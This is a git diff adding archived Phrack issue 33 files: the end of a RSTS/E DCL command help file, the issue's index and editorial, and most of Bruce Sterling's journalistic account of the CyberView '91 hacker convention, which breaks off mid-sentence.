+   /[NO]D_LINES
+   /[NO]I4
+   /[NO]LINENUMBERS
+   /LIST[=listfile]
+   /NOLIST
+   /[NO]MACHINE_CODE
+   /OBJECT[=objfile]
+   /NOOBJECT
+   /[NO]OPTIMIZE
+   /[NO]WARNINGS
+
+Qualifiers which you may use with FORTRAN-IV-PLUS or FORTRAN-77
+are as follows:
+
+Format
+
+FORTRAN/F4P file-spec[,...]   or FORTRAN/F77 file-spec[,...]
+
+Command Qualifiers                 Defaults
+
+   /[NO]CHECK                      /CHECK
+   /CONTINUATIONS=n                /CONTINUATIONS=19
+   /[NO]D_LINES                    /NOD_LINES
+   /[NO]I4                         /NO14
+   /LIST[=listfile]                /NOLIST
+   /NOLIST
+   /[NO]MACHINE_CODE               /NOMACHINE_CODE
+   /OBJECT[=objfile]               /OBJECT
+   /NOOBJECT
+   /[NO]WARNINGS                   /WARNINGS
+   /WORK_FILES=n                   /WORK_FILES=2
+
+Prompts
+
+File:   file-spec[,...]
+
+See also:  LINK
+
+*HELP
+Help can be obtained on a particular topic by typing:
+
+     HELP topic subtopic subsubtopic
+
+A topic can have the following format:
+
+1) An alphanumeric string (e.g. a command name, option, etc.)
+2) Same preceded by a "/"
+3) The match-all symbol "*"
+
+Example:
+
+HELP COPY
+
+The RSTS/E DCL User's Guide contains a complete description of all
+DCL commands supported on RSTS/E.
+
+*INITIALIZE
+Deletes any data on a tape and writes a new label.
+
+The INITIALIZE command allocates the tape drive if it is not
+already allocated.
+
+Format
+
+INITIALIZE device-name[:] [label]
+
+Qualifiers
+
+   /FORMAT=ANSI
+   /FORMAT=DOS
+   /DENSITY=nnn
+
+Prompts
+
+   Device:  magtape[:]
+   Label:   [label]
+
+See also:  MOUNT, DISMOUNT
+
+*LINK
+The LINK command links together object files to produce an
+executable program.  You can also specify an overlay structure
+for the program.
+
+Format
+
+LINK file-spec[,...]
+
+Language Qualifiers                  Comments
+
+Only one of the following may be specified:
+
+   /BASIC or /BP2                   BASIC-PLUS-2
+   /COBOL or /C81                   COBOL-81
+   /DIBOL
+   /F4P                             FORTRAN-IV-PLUS
+   /F77                             FORTRAN-77
+   /FORTRAN                         FORTRAN-IV
+   /RT11                            MACRO/RT11
+
+If no language qualifier is specified, /BASIC (for BASIC-PLUS-2)
+is assumed, unless your system manager has changed the default.
+
+    Additional
+Command Qualifiers                  Defaults
+
+   /EXECUTABLE[=file-spec]          /EXECUTABLE
+   /NOEXECUTABLE
+   /[NO]FMS                         /NOFMS
+   /MAP[=file-spec]                 /NOMAP
+   /NOMAP
+   /STRUCTURE
+   /[NO]DMS                         /NODMS
+
+Prompts
+
+Files: file-spec
+
+If /STRUCTURE was specified, you will be
+prompted for the names of the input files
+and overlay structure to use, e.g.,
+
+ROOT files:  file-spec[,...]
+Root PSECTs: [PSECT-name[,...]]
+Overlay:     [file-spec[,...][+]]
+
+You can specify /STRUCTURE if the program is written in
+BASIC-PLUS-2, DIBOL, FORTRAN-IV-PLUS, or FORTRAN-77.  You
+cannot specify /STRUCTURE if the program is written in
+COBOL, FORTRAN-IV, or MACRO/RT11.
+
+See also:  COBOL, DIBOL, BASIC, MACRO, FORTRAN
+
+*LOGOUT
+The LOGOUT command ends your session at the terminal.
+
+Format
+
+[LO]GOUT
+
+Command Qualifiers
+
+   /BRIEF
+   /FULL (default)
+
+If you include the /BRIEF qualifier after the LOGOUT command,
+RSTS/E ends your session at the terminal without displaying a
+message.  If you include the /FULL, or simply type LOGOUT, RSTS/E
+displays information about the status of your account.
+
+*MACRO
+Invokes a MACRO-11 assembler.  You can include up to six file
+specifications with the MACRO command.
+
+On RSTS/E you can use either MACRO/RT11 or MACRO/RSX11.  The default
+is MACRO/RSX11 unless your system manager has changed it.
+
+Format
+
+MACRO/RT11 filespec[,...]
+
+        OR
+
+MACRO/RSX11 filespec[,...]
+
+Command Qualifiers
+
+   /LIST[=listfile]
+   /NOLIST
+   /OBJECT[=objfile]
+   /NOOBJECT
+
+File Qualifiers
+
+   /LIBRARY
+
+See also:   LINK
+
+*MOUNT
+The MOUNT command prepares a tape or disk for processing by system
+commands or user programs. (You do not always have to MOUNT a tape
+before using it.) On some systems, mounting a disk requires privilege.
+
+Format
+
+MOUNT device-name[:] [label]
+
+Command Qualifiers                  Defaults
+
+   /[NO]WRITE                       /WRITE
+
+Qualifiers for Tapes                Defaults
+
+   /FORMAT=ANSI
+   /FORMAT=DOS
+   /FORMAT=FOREIGN
+   /DENSITY=nnn
+
+Prompts
+
+Device: device-name[:]
+Label: volume-label
+
+See also:  DISMOUNT, INITIALIZE, ALLOCATE
+
+*PRINT
+The PRINT command queues a file for printing, either on a default
+system printer or on a device you specify. A queue is the list of
+files to be printed.
+
+Format
+
+PRINT file-spec[,...]
+
+Command Qualifiers                  Defaults
+
+   /AFTER=date-time
+   /FORMS=type                      /FORMS=NORMAL
+   /JOB_COUNT=n                     /JOB_COUNT=1
+   /NAME=job-name
+   /PRIORITY=n
+   /QUEUE=queue-name[:]             /QUEUE=LP0:
+
+File Qualifiers                     Defaults
+
+   /COPIES=n                        /COPIES=1
+   /[NO]DELETE                      /NODELETE
+
+Prompts
+
+File: file-spec[,...]
+
+See also:  DELETE/JOB, SET QUEUE/JOB
+
+*RENAME
+The RENAME command changes the file name or file type of an
+existing file.
+
+Format
+
+RENAME old-file-spec[,...]  new-file-spec
+
+Qualifiers                    Defaults
+
+   /[NO]LOG                   /LOG
+   /[NO]QUERY                 /NOQUERY
+   /[NO]REPLACE               /NOREPLACE
+   /PROTECTION=n              /PROTECTION=60
+
+Prompts
+
+From: input-file-spec[,...]
+
+To: output-file-spec
+
+See also:  COPY, DELETE
+
+*REQUEST
+The REQUEST command displays a message at a system operator's terminal.
+
+Format
+
+REQUEST message-text
+
+When you use the REQUEST command to send a message to an operator,
+the message is displayed at the operator services console.
+
+*RUN
+
+The RUN command runs an executable file.
+
+Format
+
+RUN file-spec
+
+Prompts
+
+Program:  file-spec
+
+*SET HOST
+The SET HOST command lets you log into another computer from the
+system you first logged into.
+
+Format
+
+SET HOST node[::]
+
+Prompts
+
+Node: node-name
+
+*SET PROTECTION
+The SET PROTECTION command specifies the protection code of a file.
+You assign a protection code to determine who else, if anyone, can
+have access to your files.
+
+Format
+
+SET PROTECTION[=n] [file-spec,...]
+
+Qualifiers
+
+   /DEFAULT
+   /[NO]QUERY
+   /[NO]LOG
+
+Prompts
+
+Protection code:  n
+Files:  file-spec
+
+If you use SET PROTECTION/DEFAULT, RSTS/E assigns the protection
+code you specify to all files you create during the current session.
+However, do not include a file specification when you use
+the /DEFAULT qualifier.
+
+*SET QUEUE/ENTRY
+The SET QUEUE/ENTRY command changes the status of a file that is queued
+for printing or for batch job execution but is not yet processed by the
+system.
+
+Format
+
+SET QUEUE/ENTRY=sequence-number  [queue-name[:]]
+
+    Additional
+Command Qualifiers                  Defaults
+
+   /AFTER=date-time                 none
+   /BATCH
+   /FORMS=type
+   /HOLD
+   /JOB_COUNT=n
+   /PRIORITY=n
+   /RELEASE
+
+If you do not specify a queue name, LP0: is assumed.
+
+See also:  DELETE/ENTRY, SET QUEUE/JOB
+
+*SET QUEUE/JOB
+
+The SET QUEUE/JOB command uses the name of a job to modify the status
+of a file that is queued for a printer or batch queue.
+
+Format
+
+SET QUEUE/JOB=job-name [queue-name[:]]
+
+Command Qualifiers                  Defaults
+
+   /AFTER=date-time                 None.
+   /BATCH
+   /FORMS=type
+   /HOLD
+   /JOB_COUNT=n
+   /PRIORITY=n
+   /RELEASE
+
+When you submit a batch job or issue the PRINT command, the job is
+assigned a name, according to the first input file specification or
+the name you specify.  You can use this name to modify the status of
+the job in the queue.
+
+See also:  DELETE/JOB, SET QUEUE/ENTRY
+
+*SET TERMINAL
+The SET TERMINAL command lets you specify the characteristics of your
+terminal. Privileged users can also set the characteristics of other
+terminals.
+
+Format
+
+SET TERMINAL [device-name[:]]
+
+Command Qualifiers                  Defaults
+
+   /[NO]BROADCAST                   /NOBROADCAST
+   /CRFILL[=n]                      /CRFILL=0
+   /[NO]ECHO                        /ECHO
+   /[NO]HARDCOPY
+   /LA34
+   /LA36
+   /LA38
+   /LA120
+   /[NO]LOWERCASE
+   /PARITY=EVEN                     /NOPARITY
+           ODD
+   /NOPARITY
+   /[NO]SCOPE
+   /SPEED=n
+   /SPEED=(i,o)
+   /[NO]TAB                         /NOTAB
+   /[NO]TTSYNC                      /TTSYNC
+   /[NO]UPPERCASE
+   /VT05
+   /VT52
+   /VT55
+   /VT100
+   /WIDTH=n
+
+See also:  SHOW TERMINAL
+
+*SHOW DEVICES
+The SHOW DEVICES command displays the status of devices
+that have disks mounted on them or that are allocated to jobs.
+
+See also:  MOUNT, ALLOCATE
+
+*SHOW QUEUE
+The SHOW/QUEUE command displays a list of entries in the printer
+and/or batch job queues.
+
+Format
+
+SHOW QUEUE [queue-name[:]]
+
+Command Qualifiers
+
+   /BATCH
+   /BRIEF
+
+Queue: queue-name[:]
+
+To display the queue of your system's default printer, type:
+
+$ SHOW QUEUE
+
+If there are no files in the queue, RSTS/E prints a message
+similar to:
+
+LP0 queue is empty
+
+*SHOW NETWORK
+The SHOW NETWORK command displays the systems you can connect
+to by the network. If the network is operational, RSTS/E displays
+the names of different nodes that your system can access.
+
+Format
+
+SHOW NETWORK
+
+See also:  SET HOST
+
+*SHOW SYSTEM
+The SHOW SYSTEM command displays information about use of the
+system's resources. Specifically, it displays information about
+the status of all jobs, attached and detached, in use on the system.
+
+Format
+
+SHOW SYSTEM
+
+The only difference between SHOW SYSTEM and SHOW USERS is that the
+SHOW SYSTEM command includes information about the status of detached
+jobs.
+
+See also:  SHOW USERS
+
+*SHOW TERMINAL
+The SHOW TERMINAL command displays the characteristics of your
+terminal. Most of these characteristics can be changed with a
+corresponding option of the SET TERMINAL command. (Users with
+privileged accounts can display the characteristics of other terminals.)
+
+Format
+
+SHOW TERMINAL [device-name[:]]
+
+See also:  SET TERMINAL
+
+*SHOW USERS
+The SHOW USERS command displays information about the status of
+attached jobs on the system.
+
+Format
+
+SHOW USERS
+
+See also:  SHOW SYSTEM
+
+*SUBMIT
+The SUBMIT command enters one or more control files for batch processing.
+
+Format
+
+SUBMIT file-spec[,...]
+
+Command Qualifiers                  Defaults
+
+   /AFTER=date-time
+   /NAME=job-name
+   /PRIORITY=n                     /PRIORITY=128
+   /QUEUE=quename
+
+File Qualifiers                     Defaults
+
+   /[NO]DELETE                      /NODELETE
+
+Prompts
+
+File: file-spec[,...]
+
+See also:  DELETE/JOB, SET QUEUE/JOB
+
+*TYPE
+The TYPE command displays the contents of a text file (as opposed
+to a binary or temporary file).
+
+Format
+
+TYPE [node::]file-spec[,...]
+
+Command Qualifiers                  Defaults
+
+   /OUTPUT=file-spec                /OUTPUT=KB:
+   /[NO]QUERY                       /NOQUERY
+
+Prompts
+
+File: file-spec[,...]
+
+To temporarily halt the display of a file, use <CTRL/S>.  To resume
+output where it was interrupted, use <CTRL/Q>. (On a VT100 terminal
+you can also press the NO SCROLL key to stop and restart output.)
+
+To suppress the display but continue command processing, use <CTRL/O>.
+If you press <CTRL/O> again before processing is completed, output
+resumes at the current point in command processing.
+
+To stop command execution entirely, press <CTRL/C>.  The use of
+<CTRL/C> returns you to DCL command level.
+
+See also:  COPY
+
+------------------------------------------------------------------------------
+
+Hope that this file brought back memories for you guys.  It did for me! 8^]
+
+                                                   Crimson Death
+_______________________________________________________________________________
diff --git a/phrack33/1.txt b/phrack33/1.txt
new file mode 100644
index 0000000..fdc23f6
--- /dev/null
+++ b/phrack33/1.txt
@@ -0,0 +1,120 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-Three, File 1 of 13
+
+                              Issue XXXIII Index
+                               ________________
+
+                               P H R A C K  3 3
+
+                              September 15, 1991
+                               ________________
+
+                          ~Technology for Survival~
+
+     On December 24, 1989, Taran King and I released the 30th issue of Phrack
+and began to prepare for the new decade.  The future of Phrack seemed bright
+and full of great potential.  A few weeks later, Phrack was shut down by the
+United States Secret Service as part of a large scale attack on the world
+famous hacking group, the Legion of Doom.
+
+     The legend of Phrack died... or did it?  Several months later, a
+newsletter called Phrack and listed as issue 31 appeared under the editorship
+of Doc Holiday.  Of course it was not the original Doc Holiday from Tennessee,
+but instead one of the founding members of Comsec Data Security, Scott Chasin.
+It may have called itself Phrack, but it wasn't.
+
+     On November 17, 1990, another attempt was made to resurrect Phrack.
+Crimson Death and Doc Holiday were back to try again, this time calling their
+product "Phrack Classic."  That issue was not absolutely terrible, but the tone
+behind the articles was misplaced.  The introduction itself showed a lack of
+responsibility and maturity at a time when it was needed most.  To complicate
+matters, Crimson Death failed to produce another issue of Phrack Classic until
+September 1, 1991, almost 10 months later.  This lack of predictability and
+continuity has become too much of a burden on the hacker community.
+
+     I am proud to announce that a new era of Phrack has thus begun.  The new
+Phrack is listed as Phrack 33 despite the Phrack Classic issue of September
+1st.  To help ease the transition, the new Phrack staff has borrowed files
+from the PC 33 so they are chronicled correctly.  Even Crimson Death has agreed
+that it is once again time to pass the torch.
+
+     The new Phrack editor is Dispater and other people involved in working on
+this issue include Ninja Master, Circuit, and The Not.  Of course they are
+always looking for help and good articles.  The new Phrack will be run slightly
+different than the old.  The kind of information likely to be found in Phrack
+will not change drastically, but Phrack is intended for people to learn about
+the types of vulnerabilities in systems that some hackers might be likely to
+exploit.  If you are concerned about your system being disrupted by computer
+intruders, allow the hackers who write for Phrack to point out some flaws you
+might wish to correct.  Phrack still strongly supports the free exchange of
+information and will never participate in censorship except when it would be
+necessary to protect an individual's personal privacy.  There is a delicate
+balance to be found in this arena and hopefully it can be discovered.  Be
+patient and do not judge the new Phrack without really giving it a chance to
+work out the bugs.
+
+     I've said my piece, now it is time to turn over the reigns to Dispater.
+I wish him the best of luck, and for you the readers, I hope you enjoy the new
+Phrack as much as you have enjoyed the previous.
+
+     Sincerely,
+
+:Knight Lightning (kl@STORMKING.COM)
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+A few words from Dispater:
+
+     Phrack will be introducing a new regular column similar to a "letters to
+the editor" section.  It will be featured as the second file in each issue,
+beginning with issue 34.  Any questions, comments, or problems that you the
+reader would like to air with Phrack publically will be answered there.
+
+     I'd really like to thank Crimson Death for his cooperation in helping us
+get Phrack started again.  He is one of the coolest hackers I have met.  We
+could not have done it without him.  Other important people to mention are the
+The Monk and Twisted Pair.
+
+     Thanks to Tuc, Phrack will soon be using an Internet listserver.  See
+Phrack 34 for more details.  Phrack will also be found on various anonymous FTP
+sites across the Internet, including the anonymous ftp site at EFF.ORG, a Unix
+machine operated by the Electronic Frontier Foundation, an organization to
+which we at Phrack respect.  It can also be found at the anonymous ftp site at
+CS.WIDENER.EDU
+
+     Off the Internet, we hope to establish several bulletin board systems
+as archive sites including Digital Underground (812)941-9427, which is operated
+by The Not.  Submissions or letters to Phrack can be made there or on the
+Internet by sending mail to "phracksub@STORMKING.COM".
+
+     The new format will be a little more professional.  This is because I
+have no desire to find myself in court one day like Knight Lightning.  However,
+I have no intention of turning Phrack Inc. into some dry industry journal.
+Keeping things lite and entertaining is one of the ways that I was attracted
+to Phrack.  I think most people will agree that there is a balance of fun
+and business to be maintained.  If this balance is not met, you the reader,
+will get bored and so will I!
+
+     Check out Phrack World News Special Edition IV for the "details" on
+CyberView '91, the SummerCon-ference hosted by Knight Lightning that took place
+this past summer in St. Louis, Missouri.
+_______________________________________________________________________________
+
+                        Phrack XXXIII Table of Contents
+                        =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+ 1. Introduction to Phrack 33 by Knight Lightning and Dispater
+ 2. Phrack Profile of Shooting Shark by Crimson Death
+ 3. A Hacker's Guide to the Internet by The Gatsby
+ 4. FEDIX On-Line Information Service by Fedix Upix
+ 5. LATA Referance List by Infinite Loop
+ 6. International Toll Free Code List by The Trunk Terminator
+ 7. Phreaking in Germany by Ninja Master
+ 8. TCP/IP: A Tutorial Part 1 of 2 by The Not
+ 9. A REAL Functioning RED BOX Schematic by J.R."Bob" Dobbs
+10. Phrack World News Special Edition IV (CyberView '91) by Bruce Sterling
+11. PWN/Part01 by Crimson Death
+12. PWN/Part02 by Dispater
+13. PWN/Part03 by Dispater
+_______________________________________________________________________________
diff --git a/phrack33/10.txt b/phrack33/10.txt
new file mode 100644
index 0000000..b5fe694
--- /dev/null
+++ b/phrack33/10.txt
@@ -0,0 +1,417 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-Three, File 10 of 13
+
+           PWN ^*^ PWN ^*^ PWN { CyberView '91 } PWN ^*^ PWN ^*^ PWN
+           ^*^                                                   ^*^
+           PWN         P h r a c k   W o r l d   N e w s         PWN
+           ^*^         ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~         ^*^
+           PWN            Special Edition Issue Four             PWN
+           ^*^                                                   ^*^
+           PWN      "The Hackers Who Came In From The Cold"      PWN
+           ^*^                                                   ^*^
+           PWN                 June 21-23, 1991                  PWN
+           ^*^                                                   ^*^
+           PWN             Written by Bruce Sterling             PWN
+           ^*^                                                   ^*^
+           PWN ^*^ PWN ^*^ PWN { CyberView '91 } PWN ^*^ PWN ^*^ PWN
+
+
+                     The Hackers Who Came In From The Cold
+                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+     "Millionaries and vandals met at the computer-underground convention
+         to discuss free information.  What they found was free love."
+
+                  by Bruce Sterling : bruces @ well.sf.ca.us
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+**  A slightly shorter version of this article appears in Details Magazine
+    (October 1991, pages 94-97, 134).  The Details article includes photographs
+    of Knight Lightning, Erik Bloodaxe, Mitch Kapor, and Doc Holiday.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+     They called it "CyberView '91."  Actually, it was another "SummerCon" --
+the traditional summer gathering of the American hacker underground.  The
+organizer, 21 year old "Knight Lightning," had recently beaten a Computer Fraud
+and Abuse rap that might have put him in jail for thirty years.  A little
+discretion seemed in order.
+
+     The convention hotel, a seedy but accommodating motor-inn outside the
+airport in St Louis, had hosted SummerCons before.  Changing the name had been
+a good idea.  If the staff were alert, and actually recognized that these were
+the same kids back again, things might get hairy.
+
+     The SummerCon '88 hotel was definitely out of bounds.  The US Secret
+Service had set up shop in an informant's room that year, and videotaped the
+drunken antics of the now globally notorious "Legion of Doom" through a one-way
+mirror.  The running of SummerCon '88 had constituted a major count of criminal
+conspiracy against young Knight Lightning, during his 1990 federal trial.
+
+     That hotel inspired sour memories.  Besides, people already got plenty
+nervous playing "hunt the fed" at SummerCon gigs.  SummerCons generally
+featured at least one active federal informant.  Hackers and phone phreaks
+like to talk a lot.  They talk about phones and computers -- and about each
+other.
+
+     For insiders, the world of computer hacking is a lot like Mexico.  There's
+no middle class.  There's a million little kids screwing around with their
+modems, trying to snitch long-distance phone-codes, trying to swipe pirated
+software -- the "kodez kidz" and "warez doodz."  They're peons, "rodents."
+Then there's a few earnest wannabes, up-and-comers, pupils.  Not many.  Less of
+'em every year, lately.
+
+     And then there's the heavy dudes.  The players.  The Legion of Doom are
+definitely heavy.  Germany's Chaos Computer Club are very heavy, and already
+back out on parole after their dire flirtation with the KGB.  The Masters of
+Destruction in New York are a pain in the ass to their rivals in the
+underground, but ya gotta admit they are heavy.  MoD's "Phiber Optik" has
+almost completed his public-service sentence, too...  "Phoenix" and his crowd
+down in Australia used to be heavy, but nobody's heard much out of "Nom" and
+"Electron" since the Australian heat came down on them.
+
+     The people in Holland are very active, but somehow the Dutch hackers don't
+quite qualify as "heavy."  Probably because computer-hacking is legal in
+Holland, and therefore nobody ever gets busted for it.  The Dutch lack the
+proper bad attitude, somehow.
+
+     America's answer to the Dutch menace began arriving in a steady confusion
+of airport shuttle buses and college-kid decaying junkers.  A software pirate,
+one of the more prosperous attendees, flaunted a radar-detecting black
+muscle-car.  In some dim era before the jet age, this section of St Louis had
+been a mellow, fertile Samuel Clemens landscape.  Waist-high summer weeds still
+flourished beside the four-lane highway and the airport feeder roads.
+
+       The graceless CyberView hotel had been slammed down onto this landscape
+as if dropped from a B-52.  A small office-tower loomed in one corner beside a
+large parking garage.  The rest was a rambling mess of long, narrow, dimly lit
+corridors, with a small swimming pool, a glass-fronted souvenir shop and a
+cheerless dining room.  The hotel was clean enough, and the staff, despite
+provocation, proved adept at minding their own business.  For their part, the
+hackers seemed quite fond of the place.
+
+     The term "hacker" has had a spotted history.  Real "hackers," traditional
+"hackers," like to write software programs.  They like to "grind code,"
+plunging into its densest abstractions until the world outside the computer
+terminal bleaches away.  Hackers tend to be portly white techies with thick
+fuzzy beards who talk entirely in jargon, stare into space a lot, and laugh
+briefly for no apparent reason.  The CyberView crowd, though they call
+themselves "hackers," are better identified as computer intruders.  They don't
+look, talk or act like 60s M.I.T.-style hackers.
+
+     Computer intruders of the 90s aren't stone pocket-protector techies.
+They're young white suburban males, and look harmless enough, but sneaky.
+They're much the kind of kid you might find skinny-dipping at 2AM in a backyard
+suburban swimming pool.  The kind of kid who would freeze in the glare of the
+homeowner's flashlight, then frantically grab his pants and leap over the
+fence, leaving behind a half-empty bottle of tequila, a Metallica T-shirt, and,
+probably, his wallet.
+
+     One might wonder why, in the second decade of the personal-computer
+revolution, most computer intruders are still suburban teenage white whiz-kids.
+Hacking-as-computer-intrusion has been around long enough to have bred an
+entire generation of serious, heavy-duty adult computer-criminals.  Basically,
+this simply hasn't occurred.  Almost all computer intruders simply quit after
+age 22.  They get bored with it, frankly.  Sneaking around in other people's
+swimming pools simply loses its appeal.  They get out of school.  They get
+married.  They buy their own swimming pools.   They have to find some replica
+of a real life.
+
+     The Legion of Doom -- or rather, the Texas wing of LoD -- had hit Saint
+Louis in high style, this weekend of June 22.  The Legion of Doom has been
+characterized as "a high-tech street gang" by the Secret Service, but this is
+surely one of the leakiest, goofiest and best-publicized criminal conspiracies
+in American history.
+
+      Not much has been heard from Legion founder "Lex Luthor" in recent years.
+The Legion's Atlanta wing; "Prophet," "Leftist," and "Urvile," are just now
+getting out of various prisons and into Georgia halfway-houses.  "Mentor" got
+married and writes science fiction games for a living.
+
+     But "Erik Bloodaxe," "Doc Holiday," and "Malefactor" were here -- in
+person, and in the current issues of TIME and NEWSWEEK.  CyberView offered a
+swell opportunity for the Texan Doomsters to announce the formation of their
+latest high-tech, uhm, organization, "Comsec Data Security Corporation."
+
+     Comsec boasts a corporate office in Houston, and a marketing analyst, and
+a full-scale corporate computer-auditing program.  The Legion boys are now
+digital guns for hire.  If you're a well-heeled company, and you can cough up
+per diem and air-fare, the most notorious computer-hackers in America will show
+right up on your doorstep and put your digital house in order -- guaranteed.
+
+     Bloodaxe, a limber, strikingly handsome young Texan with shoulder-length
+blond hair, mirrored sunglasses, a tie, and a formidable gift of gab, did the
+talking.  Before some thirty of his former peers, gathered upstairs over
+styrofoam coffee and canned Coke in the hotel's Mark Twain Suite, Bloodaxe
+sternly announced some home truths of modern computer security.
+
+     Most so-called "computer security experts" -- (Comsec's competitors) --
+are overpriced con artists!  They charge gullible corporations thousands of
+dollars a day, just to advise that management lock its doors at night and use
+paper shredders.  Comsec Corp, on the other hand (with occasional consultant
+work from Messrs. "Pain Hertz" and "Prime Suspect") boasts America's most
+formidable pool of genuine expertise at actually breaking into computers.
+
+     Comsec, Bloodaxe continued smoothly, was not in the business of turning-in
+any former hacking compatriots.  Just in case anybody here was, you know,
+worrying...  On the other hand, any fool rash enough to challenge a
+Comsec-secured system had better be prepared for a serious hacker-to-hacker
+dust-up.
+
+     "Why would any company trust you?" someone asked languidly.
+
+     Malefactor, a muscular young Texan with close-cropped hair and the build
+of a linebacker, pointed out that, once hired, Comsec would be allowed inside
+the employer's computer system, and would have no reason at all to "break in."
+Besides, Comsec agents were to be licensed and bonded.
+
+     Bloodaxe insisted passionately that LoD were through with hacking for
+good.  There was simply no future in it.  The time had come for LoD to move on,
+and corporate consultation was their new frontier.  (The career options of
+committed computer intruders are, when you come right down to it, remarkably
+slim.)  "We don't want to be flippin' burgers or sellin' life insurance when
+we're thirty," Bloodaxe drawled.  "And wonderin' when Tim Foley is gonna come
+kickin' in the door!"  (Special Agent Timothy M. Foley of the US Secret Service
+has fully earned his reputation as the most formidable anti-hacker cop in
+America.)
+
+     Bloodaxe sighed wistfully.  "When I look back at my life... I can see I've
+essentially been in school for eleven years, teaching myself to be a computer
+security consultant."
+
+     After a bit more grilling, Bloodaxe finally got to the core of matters.
+Did anybody here hate them now? he asked, almost timidly.  Did people think the
+Legion had sold out?  Nobody offered this opinion.  The hackers shook their
+heads, they looked down at their sneakers, they had another slug of Coke.  They
+didn't seem to see how it would make much difference, really.  Not at this
+point.
+
+     Over half the attendees of CyberView publicly claimed to be out of the
+hacking game now.  At least one hacker present -- (who had shown up, for some
+reason known only to himself, wearing a blond wig and a dime-store tiara, and
+was now catching flung Cheetos in his styrofoam cup) --  already made his
+living "consulting" for private investigators.
+
+     Almost everybody at CyberView had been busted, had their computers seized,
+or, had, at least, been interrogated -- and when federal police put the squeeze
+on a teenage hacker, he generally spills his guts.
+
+     By '87, a mere year or so after they plunged seriously into anti-hacker
+OBenforcement, the Secret Service had workable dossiers on everybody that
+ really
+mattered.  By '89, they had files on practically every last soul in the
+American digital underground.  The problem for law enforcement has never been
+finding out who the hackers are.  The problem has been figuring out what the
+hell they're really up to, and, harder yet, trying to convince the public that
+it's actually important and dangerous to public safety.
+
+     From the point of view of hackers, the cops have been acting wacky lately.
+The cops, and their patrons in the telephone companies, just don't understand
+the modern world of computers, and they're scared.  "They think there are
+masterminds running spy-rings who employ us," a hacker told me.  "They don't
+understand that we don't do this for money, we do it for power and knowledge."
+Telephone security people who reach out to the underground are accused of
+divided loyalties and fired by panicked employers.  A young Missourian coolly
+psychoanalyzed the opposition.  "They're overdependent on things they don't
+understand.  They've surrendered their lives to computers."
+
+      "Power and knowledge" may seem odd motivations.  "Money" is a lot easier
+to understand.  There are growing armies of professional thieves who rip-off
+phone service for money.  Hackers, though, are into, well, power  and
+knowledge.  This has made them easier to catch than the street-hustlers who
+steal access codes at airports.  It also makes them a lot scarier.
+
+      Take the increasingly dicey problems posed by "Bulletin Board Systems."
+"Boards" are home computers tied to home telephone lines, that can store and
+transmit data over the phone -- written texts, software programs, computer
+games, electronic mail.  Boards were invented in the late 70s, and, while the
+vast majority of boards are utterly harmless, some few piratical boards swiftly
+became the very backbone of the 80s digital underground.  Over half the
+attendees of CyberView ran their own boards.  "Knight Lightning" had run an
+electronic magazine, "Phrack," that appeared on many underground boards across
+America.
+
+     Boards are mysterious.  Boards are conspiratorial.  Boards have been
+accused of harboring:  Satanists, anarchists, thieves, child pornographers,
+Aryan nazis, religious cultists, drug dealers -- and, of course, software
+pirates, phone phreaks, and hackers.  Underground hacker boards were scarcely
+reassuring, since they often sported terrifying sci-fi heavy-metal names, like
+"Speed Demon Elite," "Demon Roach Underground," and "Black Ice."  (Modern
+hacker boards tend to feature defiant titles like "Uncensored BBS," "Free
+Speech," and "Fifth Amendment.")
+
+     Underground boards carry stuff as vile and scary as, say, 60s-era
+underground newspapers -- from the time when Yippies hit Chicago and ROLLING
+STONE gave away free roach-clips to subscribers.  "Anarchy files" are popular
+features on outlaw boards, detailing how to build pipe-bombs, how to make
+Molotovs, how to brew methedrine and LSD, how to break and enter buildings, how
+to blow up bridges, the easiest ways to kill someone with a single blow of a
+blunt object -- and these boards bug straight people a lot.  Never mind that
+all this data is publicly available in public libraries where it is protected
+by the First Amendment.  There is something about its being on a computer  --
+where any teenage geek with a modem and keyboard can read it, and print it out,
+and spread it around, free as air -- there is something about that, that is
+creepy.
+
+     "Brad" is a New Age pagan from Saint Louis who runs a service known as
+"WEIRDBASE," available on an international network of boards called "FidoNet."
+Brad was mired in an interminable scandal when his readers formed a spontaneous
+underground railroad to help a New Age warlock smuggle his teenage daughter out
+of Texas, away from his fundamentalist Christian in-laws, who were utterly
+convinced that he had murdered his wife and intended to sacrifice his daughter
+to -- Satan!  The scandal made local TV in Saint Louis.  Cops came around and
+grilled Brad.  The patchouli stench of Aleister Crowley hung heavy in the air.
+There was just no end to the hassle.
+
+     If you're into something goofy and dubious and you have a board about it,
+it can mean real trouble.  Science-fiction game publisher Steve Jackson had his
+board seized in 1990.  Some cryogenics people in California, who froze a woman
+for post-mortem preservation before she was officially, er, "dead," had their
+computers seized.  People who sell dope-growing equipment have had their
+computers seized.  In 1990, boards all over America went down:  Illuminati,
+CLLI Code, Phoenix Project, Dr. Ripco. Computers are seized as "evidence," but
+since they can be kept indefinitely for study by police, this veers close to
+confiscation and punishment without trial.  One good reason why Mitchell Kapor
+showed up at CyberView.
+
+     Mitch Kapor was the co-inventor of the mega-selling business program LOTUS
+1-2-3 and the founder of the software giant, Lotus Development Corporation.  He
+is currently the president of a newly-formed electronic civil liberties group,
+the Electronic Frontier Foundation.  Kapor, now 40, customarily wears Hawaiian
+shirts and is your typical post-hippie cybernetic multimillionaire.  He and
+EFF's chief legal counsel, "Johnny Mnemonic," had flown in for the gig in
+Kapor's private jet.
+
+     Kapor had been dragged willy-nilly into the toils of the digital
+underground when he received an unsolicited floppy-disk in the mail, from an
+outlaw group known as  the "NuPrometheus League."  These rascals (still not
+apprehended) had stolen confidential proprietary software from Apple Computer,
+Inc., and were distributing it far and wide in order to blow Apple's trade
+secrets and humiliate the company.  Kapor assumed that the disk was a joke, or,
+more likely, a clever scheme to infect his machines with a computer virus.
+
+     But when the FBI showed up, at Apple's behest, Kapor was shocked at the
+extent of their naivete.  Here were these well-dressed federal officials,
+politely "Mr. Kapor"- ing him right and left, ready to carry out a war to the
+knife against evil marauding "hackers."  They didn't seem to grasp that
